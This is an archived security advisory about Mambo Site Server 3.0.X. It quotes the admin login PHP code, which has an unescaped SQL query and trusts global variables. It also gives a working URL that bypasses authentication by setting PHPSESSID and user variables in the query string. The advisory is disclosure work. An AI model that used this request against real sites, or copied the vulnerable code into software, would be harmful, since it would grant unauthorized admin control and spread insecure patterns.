Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: mambo1.htm

Mambo Site Server version 3.0.X admin privileges



COMMAND

    Mambo Site Server

SYSTEMS AFFECTED

    Mambo Site Server version 3.0.X

PROBLEM

    Ismael Peinado  Palomo found  following.   Mambo Site  Server is a
    dynamic portal  engine and  content management  tool based  on PHP
    and MySQL.  Any user can gain administrator privileges.

    Under 'administrator/'  dir. we  found that  index.php checks  the
    user and password:

        if (isset($submit)){
          $query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
          $result = $database->openConnectionWithReturn($query);
          if (mysql_num_rows($result)!= 0){
           list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
        
           .....
        
           if (strcmp($dbpass,$pass)) {
            //if the password entered does not match the database record ask user to login again
            print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
           }else {
            //if the password matches the database
            if ($remember!="on"){
             //if the user does not want the password remembered and the cookie is set, delete the cookie
             if ($passwordcookie!=""){
              setcookie("passwordcookie");
              $passwordcookie="";
             }
            }
            //set up the admin session then take the user into the admin section of the site
            session_register("myname");
            session_register("fullname");
            session_register("userid");
            print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
            print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
        
           }
          }else {
           print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
          }

    As we can  see if the  password for administrator  matches the one
    in the database, some variables are registered in the session  and
    we  are  redirected  to  index2.php...so  lets  take  a  look   at
    index2.php....

        if (!$PHPSESSID){
         print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
         exit(0);
         }
        else {
         session_start();
         if (!$myname) session_register("myname");
         if (!$fullname) session_register("fullname");
         if (!$uid) session_register("userid");
         }

    Here we can see the only  verification of a valid user is  through
    the global var. PHPSESSID, so  if we declare that variable  on the
    url,  and  set  the  'myname','fullname'  and 'userid' we can gain
    administrative control...so we'll test:

        http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

    BINGO!!  now  we  have  full  administrative privileges...that's a
    typical example  of PHP  hacking...it's clear  that security can't
    rely on global  variables since they  may be modifyed  through url
    parsing.

SOLUTION

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH